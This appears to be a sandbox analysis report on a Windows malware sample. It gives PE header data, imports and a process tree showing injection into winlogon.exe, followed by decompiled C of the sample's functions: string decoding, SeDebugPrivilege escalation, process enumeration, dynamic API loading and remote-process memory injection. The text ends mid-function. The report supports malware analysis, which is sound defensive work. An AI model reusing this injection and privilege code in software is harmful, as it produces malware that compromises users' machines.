IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x130000x4e0.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x11f890x12000False0.879055447049data7.22037238545IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x130000x23400x2400False0.452256944444data5.58339650142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x160000x507d0x200False0.13671875data0.819758377798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLLImport
KERNEL32.dllFatalAppExitW, WriteTapemark, CreatePipe, FindClose, GetWindowsDirectoryA, FatalAppExitA, TerminateProcess, ReadConsoleW, MoveFileExW, GetPrivateProfileSectionW, CreateProcessA, DebugBreak, VerLanguageNameA, WaitForSingleObject, ReleaseMutex, OpenWaitableTimerW, GetQueuedCompletionStatus, LocalSize, lstrcpyn, GetProcAddress, GetLogicalDriveStringsA, FlushViewOfFile, GetCurrentProcess, BackupSeek, SystemTimeToTzSpecificLocalTime, SetConsoleCP, InitAtomTable, HeapCompact, WriteProfileStringA, FindNextFileW, GetDateFormatA, GetNumberFormatA, CommConfigDialogA, RemoveDirectoryA, ReadConsoleOutputCharacterA, IsBadCodePtr, GetFileAttributesA, GetProcessPriorityBoost, WriteFileEx, ConvertDefaultLocale, IsBadReadPtr, CreateSemaphoreA, Toolhelp32ReadProcessMemory, SetThreadPriority, SuspendThread, GetProcessAffinityMask, CreateMailslotW, VirtualProtect, SetConsoleTitleA, GetCurrentThread, VirtualProtectEx, ReadConsoleOutputA, EnumCalendarInfoExA, FindFirstChangeNotificationA, lstrcpyW, GetFileInformationByHandle, DebugActiveProcess, DisableThreadLibraryCalls, SetLocaleInfoA, OpenEventW, FreeLibraryAndExitThread, EnumSystemCodePagesA, VirtualAlloc, MapViewOfFileEx, GetFileType
ole32.dllGetHookInterface, CoRevertToSelf, OleDraw, OleBuildVersion, OleCreateFromFile, StgCreateDocfileOnILockBytes, OpenOrCreateStream, OleCreateFromData, CreateAntiMoniker, GetHGlobalFromStream, OleSetMenuDescriptor, ReleaseStgMedium, ReadStringStream, CoFileTimeToDosDateTime, OleCreateEmbeddingHelper, RegisterDragDrop, GetHGlobalFromILockBytes, OleConvertIStorageToOLESTREAM, DllDebugObjectRPCHook, UtGetDvtd16Info, OleMetafilePictFromIconAndLabel, CoRevokeClassObject, ReadOleStg, CoRegisterMessageFilter, CreateGenericComposite, CreateStreamOnHGlobal, IsEqualGUID, OleRegEnumFormatEtc, CoFreeLibrary, CoGetTreatAsClass, OleSave, StgOpenAsyncDocfileOnIFillLockBytes, CoCopyProxy, CoIsOle1Class, CoBuildVersion, CoGetCurrentLogicalThreadId, CoReleaseMarshalData, CoQueryAuthenticationServices, OleConvertOLESTREAMToIStorageEx, CreateClassMoniker, CoImpersonateClient, StgOpenStorageEx, CoRevokeMallocSpy, OleCreate, CoUnmarshalInterface, CoGetCurrentProcess, CreateDataCache, StringFromGUID2, CoTreatAsClass, StgOpenStorage, OleCreateLinkFromData, OleGetIconOfFile, OleTranslateAccelerator, CreateDataAdviseHolder, OleCreateLinkEx, CoGetCallerTID, CoTaskMemRealloc, UtConvertDvtd32toDvtd16
ADVAPI32.dllCryptEnumProvidersW, CryptSetProviderA, QueryServiceObjectSecurity, LookupPrivilegeValueA, CryptEnumProviderTypesA, LookupSecurityDescriptorPartsW, GetLengthSid, CopySid, BuildSecurityDescriptorW, SetSecurityDescriptorDacl, RegQueryValueW, BuildTrusteeWithSidW, SetEntriesInAuditListA, BuildTrusteeWithNameW, CryptSetProvParam, RegReplaceKeyA, OpenBackupEventLogA, RegSaveKeyA, RegisterEventSourceW, UnlockServiceDatabase, LookupAccountNameA, CloseServiceHandle, GetSidSubAuthorityCount, CryptAcquireContextW, SetServiceStatus, OpenThreadToken, CryptGetDefaultProviderW, RegEnumKeyExW, AreAnyAccessesGranted, GetOldestEventLogRecord, CryptSetHashParam, CryptContextAddRef, StartServiceW, RegSetValueExA, ReadEventLogW, GetCurrentHwProfileW, GetSecurityDescriptorGroup, GetMultipleTrusteeOperationA, CryptGenRandom, ChangeServiceConfigA, SetNamedSecurityInfoExA, GetAccessPermissionsForObjectW, AddAuditAccessAce, GetOverlappedAccessResults, RegCreateKeyW, SetSecurityDescriptorSacl, LookupAccountSidA, ReportEventA, CryptSignHashW, RegQueryMultipleValuesW, DeregisterEventSource, CancelOverlappedAccess, RegQueryValueExW, OpenBackupEventLogW, BackupEventLogW, CryptDecrypt, AccessCheckAndAuditAlarmA, CreateProcessAsUserA, InitializeSecurityDescriptor, RegEnumKeyA, SetTokenInformation, AddAccessDeniedAce, RegCreateKeyExA, GetTokenInformation, IsValidAcl, RegCreateKeyExW, LookupPrivilegeNameW
SHLWAPI.dllPathMakePrettyA, SHEnumKeyExW, PathCompactPathExA, SHDeleteKeyA, UrlEscapeA, SHCreateStreamOnFileW, PathIsUNCServerA, PathFindExtensionA, SHRegDeleteUSValueA, PathFindSuffixArrayW, PathIsUNCServerW, SHRegGetUSValueW, StrCmpNA, SHRegEnumUSValueA, StrStrIA, SHSetValueW, SHOpenRegStream2A, PathIsNetworkPathA, StrCpyNW, StrRChrIW, PathSkipRootA, UrlHashA, SHRegDeleteEmptyUSKeyW, PathGetArgsA, StrRetToBufA, SHRegOpenUSKeyA, StrCatBuffW, PathRemoveArgsA, ChrCmpIA, PathBuildRootA, SHRegDeleteUSValueW, PathCompactPathA, PathIsRootW, PathSearchAndQualifyW, wnsprintfW, StrToIntW, SHQueryInfoKeyA, PathAddBackslashW, StrCmpNW, UrlUnescapeA, StrCSpnIA, SHStrDupW, PathRemoveFileSpecW, StrFormatKBSizeA, SHSetThreadRef, StrCSpnA, SHRegDuplicateHKey, UrlCanonicalizeA, UrlIsOpaqueW, SHQueryValueExA, PathCommonPrefixA, StrChrW, SHRegSetUSValueW, PathRemoveExtensionA, wvnsprintfA, PathIsDirectoryA, SHEnumValueW, StrRetToStrA, UrlEscapeW, StrCSpnIW, UrlIsW, PathStripToRootA
USER32.dllIsRectEmpty, GetSubMenu, DialogBoxParamW, ReleaseCapture, ExitWindowsEx, LoadCursorW, EndDialog, MessageBoxIndirectW, GetMenuState, TranslateMessage, SetLastErrorEx, CreateDialogParamA, GetTabbedTextExtentW, SetDlgItemTextA, GetMenuInfo, CharLowerBuffW, DdeConnect, EnumThreadWindows, UnregisterClassA, ChangeDisplaySettingsExW, TrackPopupMenuEx, SetCursorPos, GetMenuItemRect, GetCaretBlinkTime, IsMenu, GetThreadDesktop, SetPropA, GetClipboardOwner, EnumPropsExW, GetClipboardFormatNameA, DrawEdge, GetMenuCheckMarkDimensions, IsChild, DrawStateW, GetAncestor, FillRect, DlgDirListComboBoxW, WinHelpA, EnumClipboardFormats, SetPropW, EnumDisplayMonitors, GetWindowInfo, EnumDisplaySettingsA, CharUpperW, LookupIconIdFromDirectoryEx, GetQueueStatus, GetMessageTime, GetKeyboardState, DdeAddData, SendMessageTimeoutA, EnumDesktopsA, SetWindowPos, InvalidateRect, SetMessageExtraInfo, SetClipboardData

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: P8jE8nmN7G.exe PID: 4860 Parent PID: 5760

General

Start time:20:35:59
Start date:09/05/2021
Path:C:\Users\user\Desktop\P8jE8nmN7G.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\P8jE8nmN7G.exe'
Imagebase:0x400000
File size:602112 bytes
MD5 hash:AC514DCE9416EB9E4148431016629174
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: winlogon.exe PID: 560 Parent PID: 4860

General

Start time:20:36:00
Start date:09/05/2021
Path:C:\Windows\System32\winlogon.exe
Wow64 process (32bit):false
Commandline:
Imagebase:0x7ff739090000
File size:677376 bytes
MD5 hash:F9017F2DC455AD373DF036F5817A8870
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: P8jE8nmN7G.exe PID: 4860 Parent PID: 5760 P8jE8nmN7G.exeCOMMON

    Executed Functions

    Function 0040B585, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 145memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E0040B585() {
				signed int _v5;
				long _v12;
				short _v532;
				void* __ebx;
				void* _t34;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t39;
				char _t44;
				intOrPtr _t46;
				long _t47;
				void* _t49;
				int _t51;
				int _t54;
				char* _t58;
				void* _t59;
				int _t60;
				intOrPtr _t64;
				intOrPtr _t66;
				signed int _t67;
				char _t71;
				signed char* _t76;
				intOrPtr _t77;
				intOrPtr _t79;
				void* _t80;
				signed int _t81;
				char* _t84;
				int _t86;
				void* _t87;
				signed int _t90;
				void* _t92;

				 *0x416cd0 =  *0x416cd0 & 0x00000000;
				_t34 = E0040AACA();
				if(_t34 != 0) {
					 *0x416bbc =  *0x416bbc | 0xffffffff;
					_t35 = E0040BA0A(E0040B4E1);
					_t71 = 0;
					 *0x416d84 = _t35; // executed
					_t36 = HeapCreate(0, 0x80000, 0); // executed
					 *0x418074 = _t36;
					__eflags = _t36;
					if(_t36 != 0) {
						 *0x416797 = 1;
					} else {
						 *0x418074 = GetProcessHeap();
						 *0x416797 = 0;
					}
					E00414AEA();
					 *0x417074 = _t71;
					 *0x4167be = _t71;
					_t39 = E0040F0A8(0x184);
					 *0x416c34 = _t39;
					__eflags = _t39 - _t71;
					if(_t39 != _t71) {
						_v12 = _t71;
						while(1) {
							_t90 = (_v12 & 0x0000ffff) << 2;
							_t84 = E0040F0A8(( *( *(_t90 + 0x416020)) & 0x000000ff) + 1);
							__eflags = _t84 - _t71;
							if(_t84 == _t71) {
								break;
							}
							_t76 =  *(_t90 + 0x416020);
							__eflags =  *_t76 - _t71;
							_v5 = _t71;
							if( *_t76 > _t71) {
								_t67 = 0;
								__eflags = 0;
								_t80 = 0xba;
								do {
									_v5 = _v5 + 1;
									 *((char*)(_t67 + _t84)) = ( &(_t76[1]))[_t67] + _t80;
									_t67 = _v5 & 0x000000ff;
									_t80 = _t80 + 2;
									__eflags = _t67 -  *_t76;
								} while (_t67 <  *_t76);
								_t71 = 0;
								__eflags = 0;
							}
							 *((char*)((_v5 & 0x000000ff) + _t84)) = _t71;
							__eflags =  *_t84 - 0x57;
							if( *_t84 != 0x57) {
								_t46 =  *0x416c34; // 0x25df5a8
								_t86 = _t84 + 1;
								__eflags = _t86;
								 *(_t90 + _t46) = _t86;
								goto L17;
							} else {
								_t15 = _t84 + 1; // 0x1
								_t64 = E0040F4DC(( *( *(_t90 + 0x416020)) & 0x000000ff) - 1, _t15);
								_t79 =  *0x416c34; // 0x25df5a8
								 *((intOrPtr*)(_t90 + _t79)) = _t64;
								E0040F0C0(_t84);
								_t66 =  *0x416c34; // 0x25df5a8
								__eflags =  *((intOrPtr*)(_t90 + _t66)) - _t71;
								if( *((intOrPtr*)(_t90 + _t66)) != _t71) {
									L17:
									_v12 = _v12 + 1;
									__eflags = _v12 - 0x61;
									if(_v12 < 0x61) {
										continue;
									} else {
										_t47 = GetCurrentProcessId();
										_t77 =  *0x416d84; // 0x400000
										 *0x416d78 = _t47;
										_t22 = _t77 + 0x3c; // 0x100
										_t49 =  *_t22 + _t77;
										_t81 =  *(_t49 + 6) & 0x0000ffff;
										_t92 = 0;
										__eflags = _t81 - _t71;
										if(_t81 > _t71) {
											_t87 = 3;
											__eflags = _t87 - _t81;
											if(_t87 < _t81) {
												_t59 = ( *(_t49 + 0x14) & 0x0000ffff) + _t49 + 0x90;
												_t92 =  *((intOrPtr*)(_t59 + 0xc)) + _t77;
												_t60 = IsBadHugeReadPtr(_t92,  *(_t59 + 8));
												__eflags = _t60;
												if(_t60 != 0) {
													_t92 = 0;
													__eflags = 0;
												}
											}
										}
										 *0x416c64 = _t92;
										 *0x416c50 =  *0x416eac(); // executed
										_t51 = E0041158D(L"SeDebugPrivilege"); // executed
										__eflags = _t51;
										if(_t51 == 0) {
											 *0x416cd0 =  *0x416cd0 | 0x00000001;
											__eflags =  *0x416cd0;
										}
										_v12 = 0x103;
										_t54 = GetUserNameW( &_v532,  &_v12); // executed
										__eflags = _t54;
										if(__eflags == 0) {
											L26:
											 *0x416bb0 = "-";
										} else {
											_t58 = E0040F113(__eflags,  &_v532, _v12 + _v12);
											 *0x416bb0 = _t58;
											__eflags = _t58 - _t71;
											if(_t58 == _t71) {
												goto L26;
											}
										}
										_t44 = 1;
									}
								} else {
									break;
								}
							}
							L28:
							goto L29;
						}
						_t44 = 0;
						goto L28;
					} else {
						_t44 = 0;
					}
					L29:
					return _t44;
				} else {
					return _t34;
				}
			}


































    0x0040b588
    0x0040b595
    0x0040b59c
    0x0040b5a0
    0x0040b5ad
    0x0040b5b2
    0x0040b5bb
    0x0040b5c0
    0x0040b5c6
    0x0040b5cb
    0x0040b5cd
    0x0040b5e2
    0x0040b5cf
    0x0040b5d5
    0x0040b5da
    0x0040b5da
    0x0040b5e9
    0x0040b5f3
    0x0040b5f9
    0x0040b5ff
    0x0040b604
    0x0040b609
    0x0040b60b
    0x0040b615
    0x0040b619
    0x0040b61d
    0x0040b62f
    0x0040b631
    0x0040b633
    0x00000000
    0x00000000
    0x0040b635
    0x0040b63b
    0x0040b63d
    0x0040b640
    0x0040b642
    0x0040b642
    0x0040b644
    0x0040b646
    0x0040b64c
    0x0040b64f
    0x0040b652
    0x0040b659
    0x0040b65c
    0x0040b65c
    0x0040b660
    0x0040b660
    0x0040b660
    0x0040b666
    0x0040b669
    0x0040b66c
    0x0040b6a1
    0x0040b6a6
    0x0040b6a6
    0x0040b6a7
    0x00000000
    0x0040b66e
    0x0040b677
    0x0040b67c
    0x0040b681
    0x0040b688
    0x0040b68b
    0x0040b690
    0x0040b695
    0x0040b698
    0x0040b6aa
    0x0040b6aa
    0x0040b6ad
    0x0040b6b2
    0x00000000
    0x0040b6b8
    0x0040b6b8
    0x0040b6be
    0x0040b6c4
    0x0040b6c9
    0x0040b6cc
    0x0040b6ce
    0x0040b6d2
    0x0040b6d4
    0x0040b6d7
    0x0040b6db
    0x0040b6dc
    0x0040b6df
    0x0040b6e5
    0x0040b6f2
    0x0040b6f5
    0x0040b6fb
    0x0040b6fd
    0x0040b6ff
    0x0040b6ff
    0x0040b6ff
    0x0040b6fd
    0x0040b6df
    0x0040b701
    0x0040b712
    0x0040b718
    0x0040b71d
    0x0040b71f
    0x0040b721
    0x0040b721
    0x0040b721
    0x0040b733
    0x0040b73a
    0x0040b740
    0x0040b742
    0x0040b75f
    0x0040b75f
    0x0040b744
    0x0040b751
    0x0040b756
    0x0040b75b
    0x0040b75d
    0x00000000
    0x00000000
    0x0040b75d
    0x0040b769
    0x0040b769
    0x00000000
    0x00000000
    0x00000000
    0x0040b698
    0x0040b76b
    0x00000000
    0x0040b76c
    0x0040b69a
    0x00000000
    0x0040b60d
    0x0040b60d
    0x0040b60d
    0x0040b76d
    0x0040b76f
    0x0040b59f
    0x0040b59f
    0x0040b59f

    APIs
    • HeapCreate.KERNELBASE(00000000,00080000,00000000), ref: 0040B5C0
    • GetProcessHeap.KERNEL32 ref: 0040B5CF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Heap$CreateProcess
    • String ID: SeDebugPrivilege$a
    • API String ID: 1042935442-2150345230
    • Opcode ID: 9d7066090ffd46d9644d699337f011465e48944d7f28e4f2d1c34608c64d3911
    • Instruction ID: 1f6895ae0b60d46ef224a9e176b8ad6c2e485857426bfcc3600c922ed2c5ce47
    • Opcode Fuzzy Hash: 9d7066090ffd46d9644d699337f011465e48944d7f28e4f2d1c34608c64d3911
    • Instruction Fuzzy Hash: 6C5104305042549ECB209F75E8856EABFE8EF05308F0684BEE441E72A2D779D945CB9C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004070D3, Relevance: 12.2, APIs: 8, Instructions: 150memoryinjectionCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004070D3(void* _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				void* _v24;
				void* _t61;
				intOrPtr _t63;
				intOrPtr _t66;
				void* _t67;
				void* _t77;
				long _t81;
				intOrPtr* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t91;
				intOrPtr _t93;
				unsigned int _t95;
				signed int _t97;
				void* _t103;
				long _t105;
				void* _t106;
				long* _t107;
				void* _t109;
				void* _t111;

				_t86 =  *0x416d84; // 0x400000
				_t1 = _t86 + 0x3c; // 0x100
				_t111 =  *_t1 + _t86;
				_v24 = _t86;
				_t61 = VirtualAllocEx(_a4,  *(_t111 + 0x34),  *(_t111 + 0x50), 0x2000, 1); // executed
				_v8 = _t61;
				if(_t61 != 0) {
					L3:
					_t63 = E0040F0A8( *(_t111 + 0x50));
					_v20 = _t63;
					if(_t63 == 0) {
						L2:
						return 0;
					}
					E0040F0FC(_t63, _t86,  *(_t111 + 0x50));
					_t66 =  *((intOrPtr*)(_t111 + 0xa0));
					if(_t66 == 0 ||  *((intOrPtr*)(_t111 + 0xa4)) == 0) {
						L15:
						_t105 =  *(_t111 + 0x54);
						_t67 = VirtualAllocEx(_a4, _v8, _t105, 0x1000, 4); // executed
						if(_t67 == 0) {
							goto L2;
						}
						WriteProcessMemory(_a4, _v8, _t86, _t105, 0); // executed
						VirtualProtectEx(_a4, _v8, _t105, 2,  &_v16); // executed
						_v12 = _v12 & 0x00000000;
						_t106 = ( *(_t111 + 0x14) & 0x0000ffff) + _t111 + 0x18;
						if(0 >=  *(_t111 + 6)) {
							L20:
							E0040F0C0(_v20);
							return _v8;
						}
						_t107 = _t106 + 8;
						while(1) {
							_t77 = VirtualAllocEx(_a4, _v8 + _t107[1],  *_t107, 0x1000, 4); // executed
							_t87 = _t77;
							if(_t87 == 0) {
								goto L2;
							}
							WriteProcessMemory(_a4, _t87, _t107[1] + _v20,  *_t107, 0); // executed
							_t81 = 0x40;
							_v16 = _t81;
							VirtualProtectEx(_a4, _t87,  *_t107, _t81,  &_v16); // executed
							_t107 =  &(_t107[0xa]);
							_v12 = _v12 + 1;
							if(_v12 < ( *(_t111 + 6) & 0x0000ffff)) {
								continue;
							}
							goto L20;
						}
						goto L2;
					} else {
						_t91 =  *(_t111 + 0x34);
						_t103 = _v8 - _t91;
						_t109 = _t86 - _t91;
						_t84 = _t66 + _v20;
						while( *_t84 != 0) {
							_t93 =  *((intOrPtr*)(_t84 + 4));
							if(_t93 < 8) {
								L13:
								_t84 = _t84 +  *((intOrPtr*)(_t84 + 4));
								continue;
							}
							_t95 = _t93 + 0xfffffff8 >> 1;
							_v16 = _t95;
							_v12 = 0;
							if(_t95 == 0) {
								goto L13;
							} else {
								goto L9;
							}
							do {
								L9:
								_t97 =  *(_t84 + 8 + _v12 * 2) & 0x0000ffff;
								if(_t97 != 0) {
									 *((intOrPtr*)((_t97 & 0x00000fff) +  *_t84 + _v20)) =  *((intOrPtr*)((_t97 & 0x00000fff) +  *_t84 + _v20)) + _t103 - _t109;
								}
								_v12 = _v12 + 1;
							} while (_v12 < _v16);
							_t86 = _v24;
							goto L13;
						}
						goto L15;
					}
				}
				_t85 = VirtualAllocEx(_a4, _t61,  *(_t111 + 0x50), 0x2000, 1); // executed
				_v8 = _t85;
				if(_t85 != 0) {
					goto L3;
				}
				goto L2;
			}




























    0x004070da
    0x004070e1
    0x004070ed
    0x004070f2
    0x004070fb
    0x00407101
    0x00407106
    0x00407126
    0x00407129
    0x0040712e
    0x00407133
    0x0040711f
    0x00000000
    0x0040711f
    0x0040713a
    0x0040713f
    0x00407147
    0x004071b2
    0x004071b2
    0x004071c3
    0x004071cb
    0x00000000
    0x00000000
    0x004071db
    0x004071ee
    0x004071f8
    0x004071fc
    0x00407206
    0x00407269
    0x0040726c
    0x00000000
    0x00407271
    0x00407208
    0x0040720b
    0x0040721e
    0x00407224
    0x00407228
    0x00000000
    0x00000000
    0x0040723d
    0x00407245
    0x0040724b
    0x00407254
    0x0040725e
    0x00407261
    0x00407267
    0x00000000
    0x00000000
    0x00000000
    0x00407267
    0x00000000
    0x00407152
    0x00407152
    0x0040715a
    0x0040715c
    0x00407161
    0x004071ad
    0x00407165
    0x0040716b
    0x004071aa
    0x004071aa
    0x00000000
    0x004071aa
    0x00407170
    0x00407172
    0x00407175
    0x0040717c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040717e
    0x0040717e
    0x00407181
    0x00407189
    0x0040719a
    0x0040719a
    0x0040719c
    0x004071a2
    0x004071a7
    0x00000000
    0x004071a7
    0x00000000
    0x004071ad
    0x00407147
    0x00407112
    0x00407118
    0x0040711d
    0x00000000
    0x00000000
    0x00000000

    APIs
    • VirtualAllocEx.KERNELBASE(?,?,?,00002000,00000001,00000000,00000000,00000000,?,?,025DF908), ref: 004070FB
    • VirtualAllocEx.KERNELBASE(?,00000000,?,00002000,00000001,?,025DF908), ref: 00407112
    • VirtualAllocEx.KERNELBASE(?,?,?,00001000,00000004,00000000,00400000,?,?,025DF908), ref: 004071C3
    • WriteProcessMemory.KERNELBASE(?,?,00400000,?,00000000,?,025DF908), ref: 004071DB
    • VirtualProtectEx.KERNELBASE(?,?,?,00000002,025DF908,?,025DF908), ref: 004071EE
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00001000,00000004,?,025DF908), ref: 0040721E
    • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000,?,025DF908), ref: 0040723D
    • VirtualProtectEx.KERNELBASE(00000000,00000000,?,00000040,025DF908,?,025DF908), ref: 00407254
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Virtual$Alloc$MemoryProcessProtectWrite
    • String ID:
    • API String ID: 426431698-0
    • Opcode ID: a297a517308540ba8c430f5fd71bf4452da91147fb2fa7cddaf9f8209f59f5e7
    • Instruction ID: dd38471a4f7e68d7683add05fd9e9a4a04c2e990e53906189e99ae61c3131440
    • Opcode Fuzzy Hash: a297a517308540ba8c430f5fd71bf4452da91147fb2fa7cddaf9f8209f59f5e7
    • Instruction Fuzzy Hash: 46519C71A00209EFDB218F94CC84FAEBBB6FF44344F148429F506AA2E1D775AD51DB18
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004061FF, Relevance: 7.5, APIs: 5, Instructions: 49processstringCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004061FF() {
				short _v524;
				intOrPtr _v552;
				void* _v560;
				void* _t10;
				struct tagPROCESSENTRY32W* _t11;
				int _t19;
				signed short _t20;
				intOrPtr _t21;
				void* _t22;
				signed short _t24;

				_t20 = 0;
				_v560 = 0x22c;
				_t10 = CreateToolhelp32Snapshot(2, 0); // executed
				_t22 = _t10;
				_t11 =  &_v560;
				Process32FirstW(_t22, _t11); // executed
				if(_t11 != 0) {
					do {
						_t24 = 0;
						if(_v552 != 0) {
							while(1) {
								_t21 =  *0x416c34; // 0x25df5a8
								_t19 = lstrcmpiW( &_v524,  *(_t21 + ( *(0x401db0 + (_t24 & 0x0000ffff) * 2) & 0x0000ffff) * 4)); // executed
								if(_t19 == 0) {
									break;
								}
								_t24 = _t24 + 1;
								if(_t24 < 2) {
									continue;
								} else {
								}
								goto L7;
							}
							_t20 = 1;
						}
						L7:
					} while (Process32NextW(_t22,  &_v560) != 0);
				}
				FindCloseChangeNotification(_t22); // executed
				return _t20;
			}













    0x0040620e
    0x00406210
    0x0040621a
    0x00406220
    0x00406222
    0x0040622a
    0x00406232
    0x00406235
    0x00406235
    0x0040623d
    0x0040623f
    0x0040623f
    0x0040625a
    0x00406262
    0x00000000
    0x00000000
    0x00406264
    0x00406269
    0x00000000
    0x00000000
    0x0040626b
    0x00000000
    0x00406269
    0x0040626d
    0x0040626d
    0x0040626f
    0x0040627d
    0x00406281
    0x00406283
    0x0040628e

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040621A
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040622A
    • lstrcmpiW.KERNELBASE(?,025DF5A8,?,?,00000000), ref: 0040625A
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00406277
    • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 00406283
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcmpi
    • String ID:
    • API String ID: 545148253-0
    • Opcode ID: 02bb08832eb079d9b523de23ce8285367941dce07cffdee473244b62a1abd1cd
    • Instruction ID: 79abaa84898b50ec91301edb431aef3e50040447fdb93f8cf5ad041a4bee79a6
    • Opcode Fuzzy Hash: 02bb08832eb079d9b523de23ce8285367941dce07cffdee473244b62a1abd1cd
    • Instruction Fuzzy Hash: FA01B531502124ABDB106BB5FC4CBFB77B8AB45B10F1240BAF402E2190D734C852CB68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041158D, Relevance: 7.5, APIs: 5, Instructions: 42COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0041158D(WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _t9;
				int _t13;
				int _t16;
				long _t19;

				_t9 =  *0x416bbc; // 0xffffffff
				_t19 = 0;
				if(OpenProcessToken(_t9, 0x28,  &_v8) != 0) {
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					_t13 = LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					if(_t13 != 0) {
						_t16 = AdjustTokenPrivileges(_v8, 0,  &_v24, 0x10, 0, 0); // executed
						if(_t16 != 0 && GetLastError() == 0) {
							_t19 = 1;
						}
					}
					FindCloseChangeNotification(_v8); // executed
				}
				return _t19;
			}










    0x00411590
    0x004115a0
    0x004115aa
    0x004115b3
    0x004115bb
    0x004115c2
    0x004115ca
    0x004115d8
    0x004115e0
    0x004115ec
    0x004115ec
    0x004115e0
    0x004115f1
    0x004115f1
    0x004115fb

    APIs
    • OpenProcessToken.ADVAPI32(FFFFFFFF,00000028,?,00000000,0040B71D,SeDebugPrivilege), ref: 004115A2
    • LookupPrivilegeValueW.ADVAPI32(00000000), ref: 004115C2
    • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 004115D8
    • GetLastError.KERNEL32 ref: 004115E2
    • FindCloseChangeNotification.KERNELBASE(?), ref: 004115F1
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Token$AdjustChangeCloseErrorFindLastLookupNotificationOpenPrivilegePrivilegesProcessValue
    • String ID:
    • API String ID: 1669889876-0
    • Opcode ID: 54b1d8f445943a0a2cbad23dc262d6f6b9c00bde424f1f9ef516e20dc0e685d3
    • Instruction ID: d0af15cdecea10148db2b0478a55a7981dadf13aa8ff0d0c7d111229f253eee7
    • Opcode Fuzzy Hash: 54b1d8f445943a0a2cbad23dc262d6f6b9c00bde424f1f9ef516e20dc0e685d3
    • Instruction Fuzzy Hash: 34014BB1611209BFEB009FA4CD89AEFBBBDEB00344F058029B502E1160EB70DA44DA68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040B4E1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040B4E1(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t10;
				void* _t12;
				signed short _t16;
				CHAR** _t17;
				struct HINSTANCE__* _t18;

				_t12 = __edx; // executed
				_t6 = LoadLibraryA(__ecx); // executed
				_t18 = _t6;
				if(_t18 == 0) {
					L4:
					return _t18;
				}
				_t16 = 0;
				if(0 >= _a4) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t17 = _t12 + (_t16 & 0x0000ffff) * 8;
					_t10 = GetProcAddress(_t18,  *_t17);
					if(_t10 == 0) {
						break;
					}
					_t16 = _t16 + 1;
					 *(_t17[1]) = _t10;
					if(_t16 < _a4) {
						continue;
					}
					goto L4;
				}
				return 0;
			}









    0x0040b4e6
    0x0040b4e8
    0x0040b4ee
    0x0040b4f2
    0x0040b51f
    0x00000000
    0x0040b51f
    0x0040b4f6
    0x0040b4fd
    0x00000000
    0x00000000
    0x00000000
